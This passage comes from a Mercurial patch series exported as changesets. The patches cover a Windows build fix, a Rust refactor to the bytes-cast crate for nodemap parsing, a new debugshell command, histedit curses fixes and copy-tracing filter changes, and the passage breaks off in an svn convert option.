perf--helper-mergecopies + perf::heads benchmark the computation of a changelog heads + perf::helper-mergecopies find statistics about potential parameters for 'perfmergecopies' - perf--helper-pathcopies + perf::helper-pathcopies find statistic about potential parameters for the 'perftracecopies' - perf--ignore benchmark operation related to computing ignore - perf--index benchmark index creation time followed by a lookup - perf--linelogedits + perf::ignore benchmark operation related to computing ignore + perf::index benchmark index creation time followed by a lookup + perf::linelogedits (no help 
text available) - perf--loadmarkers + perf::loadmarkers benchmark the time to parse the on-disk markers for a repo - perf--log (no help text available) - perf--lookup (no help text available) - perf--lrucachedict + perf::log (no help text available) + perf::lookup (no help text available) + perf::lrucachedict (no help text available) - perf--manifest + perf::manifest benchmark the time to read a manifest from disk and return a usable - perf--mergecalculate + perf::mergecalculate (no help text available) - perf--mergecopies + perf::mergecopies measure runtime of 'copies.mergecopies' - perf--moonwalk + perf::moonwalk benchmark walking the changelog backwards - perf--nodelookup + perf::nodelookup (no help text available) - perf--nodemap + perf::nodemap benchmark the time necessary to look up revision from a cold nodemap - perf--parents + perf::parents benchmark the time necessary to fetch one changeset's parents. - perf--pathcopies + perf::pathcopies benchmark the copy tracing logic - perf--phases benchmark phasesets computation - perf--phasesremote + perf::phases benchmark phasesets computation + perf::phasesremote benchmark time needed to analyse phases of the remote server - perf--progress + perf::progress printing of progress bars - perf--rawfiles + perf::rawfiles (no help text available) - perf--revlogchunks + perf::revlogchunks Benchmark operations on revlog chunks. - perf--revlogindex + perf::revlogindex Benchmark operations against a revlog index. - perf--revlogrevision + perf::revlogrevision Benchmark obtaining a revlog revision. - perf--revlogrevisions + perf::revlogrevisions Benchmark reading a series of revisions from a revlog. - perf--revlogwrite + perf::revlogwrite Benchmark writing a series of revisions to a revlog. 
- perf--revrange + perf::revrange (no help text available) - perf--revset benchmark the execution time of a revset - perf--startup + perf::revset benchmark the execution time of a revset + perf::startup (no help text available) - perf--status benchmark the performance of a single status call - perf--tags (no help text available) - perf--templating + perf::status benchmark the performance of a single status call + perf::tags (no help text available) + perf::templating test the rendering time of a given template - perf--unidiff + perf::unidiff benchmark a unified diff between revisions - perf--volatilesets + perf::volatilesets benchmark the computation of various volatile set - perf--walk (no help text available) - perf--write microbenchmark ui.write (and others) + perf::walk (no help text available) + perf::write microbenchmark ui.write (and others) (use 'hg help -v perf' to show built-in aliases and global options) $ hg help perfaddremove - hg perf--addremove + hg perf::addremove aliases: perfaddremove # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1611619407 18000 # Mon Jan 25 19:03:27 2021 -0500 # Node ID 38b9a63d3a13176a2d83a13898d51fe617e5ecda # Parent d8ad391e10f501c817ae80a88050a7cb78a1e782 cext: restore the ability to build on Windows with py2 This broke in e92ca942ddca. Differential Revision: https://phab.mercurial-scm.org/D9867 diff --git a/contrib/python-zstandard/zstd/common/pythoncapi_compat.h b/contrib/python-zstandard/zstd/common/pythoncapi_compat.h --- a/contrib/python-zstandard/zstd/common/pythoncapi_compat.h +++ b/contrib/python-zstandard/zstd/common/pythoncapi_compat.h @@ -20,6 +20,11 @@ #include "frameobject.h" // PyFrameObject, PyFrame_GetBack() +/* VC 2008 doesn't know about the inline keyword. */ +#if defined(_MSC_VER) && _MSC_VER < 1900 +#define inline __forceinline +#endif + // Cast argument to PyObject* type. 
#ifndef _PyObject_CAST # define _PyObject_CAST(op) ((PyObject*)(op)) diff --git a/mercurial/pythoncapi_compat.h b/mercurial/pythoncapi_compat.h --- a/mercurial/pythoncapi_compat.h +++ b/mercurial/pythoncapi_compat.h @@ -20,6 +20,11 @@ #include "frameobject.h" // PyFrameObject, PyFrame_GetBack() +/* VC 2008 doesn't know about the inline keyword. */ +#if defined(_MSC_VER) && _MSC_VER < 1900 +#define inline __forceinline +#endif + // Cast argument to PyObject* type. #ifndef _PyObject_CAST # define _PyObject_CAST(op) ((PyObject*)(op)) # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1610723514 -3600 # Fri Jan 15 16:11:54 2021 +0100 # Node ID 0800aa42bb4c3132ef0558fb938ab1050dc9ca19 # Parent 38b9a63d3a13176a2d83a13898d51fe617e5ecda rust: use the bytes-cast crate to parse persistent nodemaps This crate casts pointers to custom structs, with compile-time safety checks, for easy and efficient binary data parsing. See https://crates.io/crates/bytes-cast and https://docs.rs/bytes-cast/0.1.0/bytes_cast/ Differential Revision: https://phab.mercurial-scm.org/D9788 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -55,6 +55,24 @@ source = "registry+https://github.com/rust-lang/crates.io-index" [[package]] +name = "bytes-cast" +version = "0.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +dependencies = [ + "bytes-cast-derive 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)", +] + +[[package]] +name = "bytes-cast-derive" +version = "0.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +dependencies = [ + "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", + "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", + "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", +] + +[[package]] name = "cc" version = "1.0.66" source = "registry+https://github.com/rust-lang/crates.io-index" @@ -277,6 +295,7 @@ 
version = "0.1.0" dependencies = [ "byteorder 1.3.4 (registry+https://github.com/rust-lang/crates.io-index)", + "bytes-cast 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)", "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)", "crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", "flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)", @@ -910,6 +929,8 @@ "checksum bitflags 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "cf1de2fe8c75bc145a2f577add951f8134889b4795d47466a54a5c846d691693" "checksum bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "031043d04099746d8db04daf1fa424b2bc8bd69d92b25962dcde24da39ab64a2" "checksum byteorder 1.3.4 (registry+https://github.com/rust-lang/crates.io-index)" = "08c48aae112d48ed9f069b33538ea9e3e90aa263cfa3d1c24309612b1f7472de" +"checksum bytes-cast 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "3196ba300c7bc9282a4331e878496cb3e9603a898a8f1446601317163e16ca52" +"checksum bytes-cast-derive 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "cb936af9de38476664d6b58e529aff30d482e4ce1c5e150293d00730b0d81fdb" "checksum cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)" = "4c0496836a84f8d0495758516b8621a622beb77c0fed418570e50764093ced48" "checksum cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)" = "4785bdd1c96b2a846b2bd7cc02e86b6b3dbf14e7e53446c4f54c92a361040822" "checksum cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" diff --git a/rust/hg-core/Cargo.toml b/rust/hg-core/Cargo.toml --- a/rust/hg-core/Cargo.toml +++ b/rust/hg-core/Cargo.toml @@ -9,6 +9,7 @@ name = "hg" [dependencies] +bytes-cast = "0.1" byteorder = "1.3.4" hex = "0.4.2" im-rc = "15.0.*" diff --git a/rust/hg-core/src/revlog/nodemap.rs b/rust/hg-core/src/revlog/nodemap.rs --- 
a/rust/hg-core/src/revlog/nodemap.rs +++ b/rust/hg-core/src/revlog/nodemap.rs @@ -17,12 +17,12 @@ RevlogIndex, NULL_REVISION, }; +use bytes_cast::{unaligned, BytesCast}; use std::cmp::max; use std::fmt; -use std::mem; +use std::mem::{self, align_of, size_of}; use std::ops::Deref; use std::ops::Index; -use std::slice; #[derive(Debug, PartialEq)] pub enum NodeMapError { @@ -149,7 +149,7 @@ /// Low level NodeTree [`Blocks`] elements /// /// These are exactly as for instance on persistent storage. -type RawElement = i32; +type RawElement = unaligned::I32Be; /// High level representation of values in NodeTree /// [`Blocks`](struct.Block.html) @@ -168,23 +168,24 @@ /// /// See [`Block`](struct.Block.html) for explanation about the encoding. fn from(raw: RawElement) -> Element { - if raw >= 0 { - Element::Block(raw as usize) - } else if raw == -1 { + let int = raw.get(); + if int >= 0 { + Element::Block(int as usize) + } else if int == -1 { Element::None } else { - Element::Rev(-raw - 2) + Element::Rev(-int - 2) } } } impl From<Element> for RawElement { fn from(element: Element) -> RawElement { - match element { + RawElement::from(match element { Element::None => 0, - Element::Block(i) => i as RawElement, + Element::Block(i) => i as i32, Element::Rev(rev) => -rev - 2, - } + }) } } @@ -212,42 +213,24 @@ /// represented at all, because we want an immutable empty nodetree /// to be valid. -#[derive(Copy, Clone)] -pub struct Block([u8; BLOCK_SIZE]); +const ELEMENTS_PER_BLOCK: usize = 16; // number of different values in a nybble -/// Not derivable for arrays of length >32 until const generics are stable -impl PartialEq for Block { - fn eq(&self, other: &Self) -> bool { - self.0[..] == other.0[..] 
- } -} - -pub const BLOCK_SIZE: usize = 64; +#[derive(Copy, Clone, BytesCast, PartialEq)] +#[repr(transparent)] +pub struct Block([RawElement; ELEMENTS_PER_BLOCK]); impl Block { fn new() -> Self { - // -1 in 2's complement to create an absent node - let byte: u8 = 255; - Block([byte; BLOCK_SIZE]) + let absent_node = RawElement::from(-1); + Block([absent_node; ELEMENTS_PER_BLOCK]) } fn get(&self, nybble: u8) -> Element { - let index = nybble as usize * mem::size_of::<RawElement>(); - Element::from(RawElement::from_be_bytes([ - self.0[index], - self.0[index + 1], - self.0[index + 2], - self.0[index + 3], - ])) + self.0[nybble as usize].into() } fn set(&mut self, nybble: u8, element: Element) { - let values = RawElement::to_be_bytes(element.into()); - let index = nybble as usize * mem::size_of::<RawElement>(); - self.0[index] = values[0]; - self.0[index + 1] = values[1]; - self.0[index + 2] = values[2]; - self.0[index + 3] = values[3]; + self.0[nybble as usize] = element.into() } } @@ -398,16 +381,17 @@ // Transmute the `Vec<Block>` to a `Vec<u8>`. Blocks are contiguous // bytes, so this is perfectly safe. let bytes = unsafe { - // Assert that `Block` hasn't been changed and has no padding - let _: [u8; 4 * BLOCK_SIZE] = - std::mem::transmute([Block::new(); 4]); + // Check for compatible allocation layout. + // (Optimized away by constant-folding + dead code elimination.) + assert_eq!(size_of::<Block>(), 64); + assert_eq!(align_of::<Block>(), 1); // /!\ Any use of `vec` after this is use-after-free. 
// TODO: use `into_raw_parts` once stabilized Vec::from_raw_parts( vec.as_ptr() as *mut u8, - vec.len() * BLOCK_SIZE, - vec.capacity() * BLOCK_SIZE, + vec.len() * size_of::<Block>(), + vec.capacity() * size_of::<Block>(), ) }; (readonly, bytes) @@ -613,7 +597,7 @@ amount: usize, ) -> Self { assert!(buffer.len() >= amount); - let len_in_blocks = amount / BLOCK_SIZE; + let len_in_blocks = amount / size_of::<Block>(); NodeTreeBytes { buffer, len_in_blocks, @@ -625,12 +609,11 @@ type Target = [Block]; fn deref(&self) -> &[Block] { - unsafe { - slice::from_raw_parts( - (&self.buffer).as_ptr() as *const Block, - self.len_in_blocks, - ) - } + Block::slice_from_bytes(&self.buffer, self.len_in_blocks) + // `NodeTreeBytes::new` already asserted that `self.buffer` is + // large enough. + .unwrap() + .0 } } @@ -774,13 +757,13 @@ let mut raw = [255u8; 64]; let mut counter = 0; - for val in [0, 15, -2, -1, -3].iter() { - for byte in RawElement::to_be_bytes(*val).iter() { + for val in [0_i32, 15, -2, -1, -3].iter() { + for byte in val.to_be_bytes().iter() { raw[counter] = *byte; counter += 1; } } - let block = Block(raw); + let (block, _) = Block::from_bytes(&raw).unwrap(); assert_eq!(block.get(0), Element::Block(0)); assert_eq!(block.get(1), Element::Block(15)); assert_eq!(block.get(3), Element::None); @@ -1108,7 +1091,7 @@ let (_, bytes) = idx.nt.into_readonly_and_added_bytes(); // only the root block has been changed - assert_eq!(bytes.len(), BLOCK_SIZE); + assert_eq!(bytes.len(), size_of::<Block>()); // big endian for -2 assert_eq!(&bytes[4..2 * 4], [255, 255, 255, 254]); // big endian for -6 diff --git a/rust/hg-core/src/revlog/nodemap_docket.rs b/rust/hg-core/src/revlog/nodemap_docket.rs --- a/rust/hg-core/src/revlog/nodemap_docket.rs +++ b/rust/hg-core/src/revlog/nodemap_docket.rs @@ -1,5 +1,5 @@ +use bytes_cast::{unaligned, BytesCast}; use memmap::Mmap; -use std::convert::TryInto; use std::path::{Path, PathBuf}; use super::revlog::RevlogError; @@ -13,6 +13,16 @@ // TODO: 
keep here more of the data from `parse()` when we need it } +#[derive(BytesCast)] +#[repr(C)] +struct DocketHeader { + uid_size: u8, + _tip_rev: unaligned::U64Be, + data_length: unaligned::U64Be, + _data_unused: unaligned::U64Be, + tip_node_size: unaligned::U64Be, +} + impl NodeMapDocket { /// Return `Ok(None)` when the caller should proceed without a persistent /// nodemap: @@ -36,25 +46,22 @@ Ok(bytes) => bytes, }; - let mut input = if let Some((&ONDISK_VERSION, rest)) = + let input = if let Some((&ONDISK_VERSION, rest)) = docket_bytes.split_first() { rest } else { return Ok(None); }; - let input = &mut input; - let uid_size = read_u8(input)? as usize; - let _tip_rev = read_be_u64(input)?; + let (header, rest) = DocketHeader::from_bytes(input)?; + let uid_size = header.uid_size as usize; // TODO: do we care about overflow for 4 GB+ nodemap files on 32-bit // systems? - let data_length = read_be_u64(input)? as usize; - let _data_unused = read_be_u64(input)?; - let tip_node_size = read_be_u64(input)? as usize; - let uid = read_bytes(input, uid_size)?; - let _tip_node = read_bytes(input, tip_node_size)?; - + let tip_node_size = header.tip_node_size.get() as usize; + let data_length = header.data_length.get() as usize; + let (uid, rest) = u8::slice_from_bytes(rest, uid_size)?; + let (_tip_node, _rest) = u8::slice_from_bytes(rest, tip_node_size)?; let uid = std::str::from_utf8(uid).map_err(|_| RevlogError::Corrupted)?; let docket = NodeMapDocket { data_length }; @@ -81,29 +88,6 @@ } } -fn read_bytes<'a>( - input: &mut &'a [u8], - count: usize, -) -> Result<&'a [u8], RevlogError> { - if let Some(start) = input.get(..count) { - *input = &input[count..]; - Ok(start) - } else { - Err(RevlogError::Corrupted) - } -} - -fn read_u8<'a>(input: &mut &[u8]) -> Result<u8, RevlogError> { - Ok(read_bytes(input, 1)?[0]) -} - -fn read_be_u64<'a>(input: &mut &[u8]) -> Result<u64, RevlogError> { - let array = read_bytes(input, std::mem::size_of::<u64>())? 
- .try_into() - .unwrap(); - Ok(u64::from_be_bytes(array)) -} - fn rawdata_path(docket_path: &Path, uid: &str) -> PathBuf { let docket_name = docket_path .file_name() diff --git a/rust/hg-core/src/revlog/revlog.rs b/rust/hg-core/src/revlog/revlog.rs --- a/rust/hg-core/src/revlog/revlog.rs +++ b/rust/hg-core/src/revlog/revlog.rs @@ -29,6 +29,12 @@ UnknowDataFormat(u8), } +impl From<bytes_cast::FromBytesError> for RevlogError { + fn from(_: bytes_cast::FromBytesError) -> Self { + RevlogError::Corrupted + } +} + /// Read only implementation of revlog. pub struct Revlog { /// When index and data are not interleaved: bytes of the revlog index. # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611570863 -3600 # Mon Jan 25 11:34:23 2021 +0100 # Node ID cfb6c10c08c218e80ff43a3f935cd1e44cfb451a # Parent 0800aa42bb4c3132ef0558fb938ab1050dc9ca19 rust: replace an unsafe use of transmute with a safe use of bytes-cast Differential Revision: https://phab.mercurial-scm.org/D9859 diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -8,8 +8,9 @@ //! In Mercurial code base, it is customary to call "a node" the binary SHA //! of a revision. 
+use bytes_cast::BytesCast; use hex::{self, FromHex, FromHexError}; -use std::convert::{TryFrom, TryInto}; +use std::convert::TryFrom; /// The length in bytes of a `Node` /// @@ -49,7 +50,7 @@ /// /// [`nybbles_len`]: #method.nybbles_len /// [`ExactLengthRequired`]: struct.NodeError#variant.ExactLengthRequired -#[derive(Clone, Debug, PartialEq)] +#[derive(Clone, Debug, PartialEq, BytesCast)] #[repr(transparent)] pub struct Node { data: NodeData, @@ -68,14 +69,14 @@ /// Return an error if the slice has an unexpected length impl<'a> TryFrom<&'a [u8]> for &'a Node { - type Error = std::array::TryFromSliceError; + type Error = (); #[inline] fn try_from(bytes: &'a [u8]) -> Result<&'a Node, Self::Error> { - let data = bytes.try_into()?; - // Safety: `#[repr(transparent)]` makes it ok to "wrap" the target - // of a reference to the type of the single field. - Ok(unsafe { std::mem::transmute::<&NodeData, &Node>(data) }) + match Node::from_bytes(bytes) { + Ok((node, rest)) if rest.is_empty() => Ok(node), + _ => Err(()), + } } } # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1611616776 -3600 # Tue Jan 26 00:19:36 2021 +0100 # Node ID f25c770c217b2a1b35c66bc5e68aac968af2a275 # Parent cfb6c10c08c218e80ff43a3f935cd1e44cfb451a debugshell: add a simple command for starting an interactive shell This simplifies interactive exploration of the Mercurial APIs. The ui and repo instances are provided as local variables. Differential Revision: https://phab.mercurial-scm.org/D9866 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -3717,6 +3717,23 @@ ui.writenoi18n(b' revision %s\n' % v[1]) +@command(b'debugshell', optionalrepo=True) +def debugshell(ui, repo): + """run an interactive Python interpreter + + The local namespace is provided with a reference to the ui and + the repo instance (if available). 
+ """ + import code + + imported_objects = { + 'ui': ui, + 'repo': repo, + } + + code.interact(local=imported_objects) + + @command( b'debugsuccessorssets', [(b'', b'closest', False, _(b'return closest successors sets only'))], diff --git a/tests/test-completion.t b/tests/test-completion.t --- a/tests/test-completion.t +++ b/tests/test-completion.t @@ -130,6 +130,7 @@ debugrevspec debugserve debugsetparents + debugshell debugsidedata debugssl debugstrip @@ -319,6 +320,7 @@ debugrevspec: optimize, show-revs, show-set, show-stage, no-optimized, verify-optimized debugserve: sshstdio, logiofd, logiofile debugsetparents: + debugshell: debugsidedata: changelog, manifest, dir debugssl: debugstrip: rev, force, no-backup, nobackup, , keep, bookmark, soft diff --git a/tests/test-help.t b/tests/test-help.t --- a/tests/test-help.t +++ b/tests/test-help.t @@ -1069,6 +1069,7 @@ debugsetparents manually set the parents of the current working directory (DANGEROUS) + debugshell run an interactive Python interpreter debugsidedata dump the side data for a cl/manifest/file revision debugssl test a secure connection to a server # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1611699930 18000 # Tue Jan 26 17:25:30 2021 -0500 # Node ID 66e8e279133bb4abd3b63b0eb344ee9931321ec1 # Parent f25c770c217b2a1b35c66bc5e68aac968af2a275 hghave: list the module needed for the `vcr` check I'm tired of having to look up modules each time I setup a system, and try to distinguish between similar package names to get the right one. Now that the search API has been disabled, it's even harder. There are other python packages here that should be listed like this, but this is the one that came up missing today, so it's a start. 
Differential Revision: https://phab.mercurial-scm.org/D9879 diff --git a/tests/hghave.py b/tests/hghave.py --- a/tests/hghave.py +++ b/tests/hghave.py @@ -1034,7 +1034,7 @@ return matchoutput('sqlite3 -version', br'^3\.\d+') -@check('vcr', 'vcr http mocking library') +@check('vcr', 'vcr http mocking library (pytest-vcr)') def has_vcr(): try: import vcr # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1611347352 18000 # Fri Jan 22 15:29:12 2021 -0500 # Node ID 8477c91b5e8e981e531e78f885197401fbee7ddf # Parent 66e8e279133bb4abd3b63b0eb344ee9931321ec1 histedit: don't assign to _ for unused values I don't know what this ignored value is, but we need to not clobber the _() function from gettext, or we get mysterious crashes instead of internationalizing some strings in my upcoming patches. Differential Revision: https://phab.mercurial-scm.org/D9853 diff --git a/hgext/histedit.py b/hgext/histedit.py --- a/hgext/histedit.py +++ b/hgext/histedit.py @@ -1615,7 +1615,7 @@ stdscr.refresh() while True: try: - oldmode, _ = state[b'mode'] + oldmode, unused = state[b'mode'] if oldmode == MODE_INIT: changemode(state, MODE_RULES) e = event(state, ch) @@ -1630,7 +1630,7 @@ if size != stdscr.getmaxyx(): curses.resizeterm(*size) - curmode, _ = state[b'mode'] + curmode, unused = state[b'mode'] sizes = layout(curmode) if curmode != oldmode: state[b'page_height'] = sizes[b'main'][0] # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1611347520 18000 # Fri Jan 22 15:32:00 2021 -0500 # Node ID a936e570288daffd18bd1d518ce0bf885891c823 # Parent 8477c91b5e8e981e531e78f885197401fbee7ddf histedit: notice when the main window underflows height and abort If you try to have a 13-line-tall terminal and use curses histedit, it fails by spinning in an infinite loop due to the catch-all ignore of curses errors on line 1682 of histedit.py. We should also fix that catch-all ignore of curses errors (what other demons lurk here, I wonder?) 
but we can trivially catch this case and guide the user to a happy path. We've seen this mostly in IDE users that have a tendency to have really tiny embedded terminal windows. Differential Revision: https://phab.mercurial-scm.org/D9854 diff --git a/hgext/histedit.py b/hgext/histedit.py --- a/hgext/histedit.py +++ b/hgext/histedit.py @@ -1581,10 +1581,19 @@ def layout(mode): maxy, maxx = stdscr.getmaxyx() helplen = len(helplines(mode)) + mainlen = maxy - helplen - 12 + if mainlen < 1: + raise error.Abort( + _(b"terminal dimensions %d by %d too small for curses histedit") + % (maxy, maxx), + hint=_( + b"enlarge your terminal or use --config ui.interface=text" + ), + ) return { b'commit': (12, maxx), b'help': (helplen, maxx), - b'main': (maxy - helplen - 12, maxx), + b'main': (mainlen, maxx), } def drawvertwin(size, y, x): # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1611348186 18000 # Fri Jan 22 15:43:06 2021 -0500 # Node ID 11ce2977572f058fdf3ea12cb69d480b24a24efc # Parent a936e570288daffd18bd1d518ce0bf885891c823 histedit: rip out mysterious catch-all ignore curses.error handler I have no idea why this was here, and ripping it out doesn't obviously break anything for me (tests all pass, I can poke around chistedit UI a bit without issue), so I'm thinking we should rip it out and see if we get bug reports. 
Differential Revision: https://phab.mercurial-scm.org/D9855 diff --git a/hgext/histedit.py b/hgext/histedit.py --- a/hgext/histedit.py +++ b/hgext/histedit.py @@ -1623,63 +1623,60 @@ stdscr.clear() stdscr.refresh() while True: - try: - oldmode, unused = state[b'mode'] - if oldmode == MODE_INIT: - changemode(state, MODE_RULES) - e = event(state, ch) - - if e == E_QUIT: - return False - if e == E_HISTEDIT: - return state[b'rules'] + oldmode, unused = state[b'mode'] + if oldmode == MODE_INIT: + changemode(state, MODE_RULES) + e = event(state, ch) + + if e == E_QUIT: + return False + if e == E_HISTEDIT: + return state[b'rules'] + else: + if e == E_RESIZE: + size = screen_size() + if size != stdscr.getmaxyx(): + curses.resizeterm(*size) + + curmode, unused = state[b'mode'] + sizes = layout(curmode) + if curmode != oldmode: + state[b'page_height'] = sizes[b'main'][0] + # Adjust the view to fit the current screen size. + movecursor(state, state[b'pos'], state[b'pos']) + + # Pack the windows against the top, each pane spread across the + # full width of the screen. 
+ y, x = (0, 0) + helpwin, y, x = drawvertwin(sizes[b'help'], y, x) + mainwin, y, x = drawvertwin(sizes[b'main'], y, x) + commitwin, y, x = drawvertwin(sizes[b'commit'], y, x) + + if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP): + if e == E_PAGEDOWN: + changeview(state, +1, b'page') + elif e == E_PAGEUP: + changeview(state, -1, b'page') + elif e == E_LINEDOWN: + changeview(state, +1, b'line') + elif e == E_LINEUP: + changeview(state, -1, b'line') + + # start rendering + commitwin.erase() + helpwin.erase() + mainwin.erase() + if curmode == MODE_PATCH: + renderpatch(mainwin, state) + elif curmode == MODE_HELP: + renderstring(mainwin, state, __doc__.strip().splitlines()) else: - if e == E_RESIZE: - size = screen_size() - if size != stdscr.getmaxyx(): - curses.resizeterm(*size) - - curmode, unused = state[b'mode'] - sizes = layout(curmode) - if curmode != oldmode: - state[b'page_height'] = sizes[b'main'][0] - # Adjust the view to fit the current screen size. - movecursor(state, state[b'pos'], state[b'pos']) - - # Pack the windows against the top, each pane spread across the - # full width of the screen. 
- y, x = (0, 0) - helpwin, y, x = drawvertwin(sizes[b'help'], y, x) - mainwin, y, x = drawvertwin(sizes[b'main'], y, x) - commitwin, y, x = drawvertwin(sizes[b'commit'], y, x) - - if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP): - if e == E_PAGEDOWN: - changeview(state, +1, b'page') - elif e == E_PAGEUP: - changeview(state, -1, b'page') - elif e == E_LINEDOWN: - changeview(state, +1, b'line') - elif e == E_LINEUP: - changeview(state, -1, b'line') - - # start rendering - commitwin.erase() - helpwin.erase() - mainwin.erase() - if curmode == MODE_PATCH: - renderpatch(mainwin, state) - elif curmode == MODE_HELP: - renderstring(mainwin, state, __doc__.strip().splitlines()) - else: - renderrules(mainwin, state) - rendercommit(commitwin, state) - renderhelp(helpwin, state) - curses.doupdate() - # done rendering - ch = encoding.strtolocal(stdscr.getkey()) - except curses.error: - pass + renderrules(mainwin, state) + rendercommit(commitwin, state) + renderhelp(helpwin, state) + curses.doupdate() + # done rendering + ch = encoding.strtolocal(stdscr.getkey()) def _chistedit(ui, repo, freeargs, opts): # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1610759935 -3600 # Sat Jan 16 02:18:55 2021 +0100 # Node ID f213b250fed0c88c7be9f32538477dd64eab8184 # Parent 11ce2977572f058fdf3ea12cb69d480b24a24efc copies: explicitly filter out existing file in graftcopies The `graftcopies` function does something very strange (maybe even wrong), it calls `_filter` with a pair of changeset that does not match the one used to compute the copies informations. We are about to do some rework of `_filter` to make it closer to its documented intent and fix a couple of bug. This means some of the logic that only make sense for graft need to go somewhere else. We add the extra filtering with proper documentation to `graftcopies`. 
Differential Revision: https://phab.mercurial-scm.org/D9802 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -1220,6 +1220,12 @@ by merge.update(). """ new_copies = pathcopies(base, ctx) - _filter(wctx.p1(), wctx, new_copies) + parent = wctx.p1() + _filter(parent, wctx, new_copies) + # extra filtering to drop copy information for files that existed before + # the graft (otherwise we would create merge filelog for non-merge commit + for dest, __ in list(new_copies.items()): + if dest in parent: + del new_copies[dest] for dst, src in pycompat.iteritems(new_copies): wctx[dst].markcopied(src) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1610750991 -3600 # Fri Jan 15 23:49:51 2021 +0100 # Node ID 154ded9104f1dc773fe0b6b7f7aa4423bbe2ba00 # Parent f213b250fed0c88c7be9f32538477dd64eab8184 copies: clarify which case some conditional are handling This make the function a bit clearer. The middle conditional get no label because we about about to remove it. See next changeset for details. Differential Revision: https://phab.mercurial-scm.org/D9794 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -60,13 +60,13 @@ for k, v in list(t.items()): # remove copies from files that didn't exist - if v not in src: + if v not in src: # case 5 del t[k] # remove criss-crossed copies elif k in src and v in dst: del t[k] # remove copies to files that were then removed - elif k not in dst: + elif k not in dst: # case 1 del t[k] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1610751521 -3600 # Fri Jan 15 23:58:41 2021 +0100 # Node ID 1d6d1a15a96344a505645991794333f26761ca79 # Parent 154ded9104f1dc773fe0b6b7f7aa4423bbe2ba00 copies: simplify the conditional for _filter's case 3 The conditional is much simpler and the test are actually happier. 
This clarification of the conditional will also be necessary to properly support tracing more renames in a coming changeset. Differential Revision: https://phab.mercurial-scm.org/D9795 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -59,14 +59,13 @@ # Cases 1, 3, and 5 are then removed by _filter(). for k, v in list(t.items()): - # remove copies from files that didn't exist - if v not in src: # case 5 + if k == v: # case 3 del t[k] - # remove criss-crossed copies - elif k in src and v in dst: + elif v not in src: # case 5 + # remove copies from files that didn't exist del t[k] - # remove copies to files that were then removed elif k not in dst: # case 1 + # remove copies to files that were then removed del t[k] diff --git a/tests/test-copies.t b/tests/test-copies.t --- a/tests/test-copies.t +++ b/tests/test-copies.t @@ -93,8 +93,8 @@ x y $ hg debugp1copies -r 1 x -> y -Incorrectly doesn't show the rename $ hg debugpathcopies 0 1 + x -> y (no-filelog !) Copy a file onto another file with same content. If metadata is stored in changeset, this does not produce a new filelog entry. The changeset's "files" entry should still list the file. @@ -111,8 +111,8 @@ x x2 $ hg debugp1copies -r 1 x -> x2 -Incorrectly doesn't show the rename $ hg debugpathcopies 0 1 + x -> x2 (no-filelog !) Rename file in a loop: x->y->z->x $ newrepo # HG changeset patch # User Nikita Slyusarev <nslus@yandex-team.com> # Date 1610399476 -10800 # Tue Jan 12 00:11:16 2021 +0300 # Node ID 7525e77b5eac36f88b655a6067fe1969af733003 # Parent 1d6d1a15a96344a505645991794333f26761ca79 convert: option to set date and time for svn commits Converting to subversion repository is not preserving original commit dates as it may break some subversion functionality if commit dates are not monotonically increasing. 
This patch adds `convert.svn.dangerous-set-commit-dates` configuration option to change this behaviour and enable commit dates convertion for those who want to take risks. Subversion always uses commit dates with UTC timezone, so only timestamps are used. Test `test-convert-svn-sink.t` uses `svnxml.py` script to dump history of svn repositories. Atm the script is not printing `date` field from svn log. This patch changes this to allow checks on correctness of date and time convertion. Documentation is updated. Additional test case is added to test commit dates convertion. Differential Revision: https://phab.mercurial-scm.org/D9721 diff --git a/hgext/convert/__init__.py b/hgext/convert/__init__.py --- a/hgext/convert/__init__.py +++ b/hgext/convert/__init__.py @@ -491,6 +491,22 @@ :convert.skiptags: does not convert tags from the source repo to the target repo. The default is False. + + Subversion Destination + ###################### + + Original commit dates are not preserved by default. + + :convert.svn.dangerous-set-commit-dates: preserve original commit 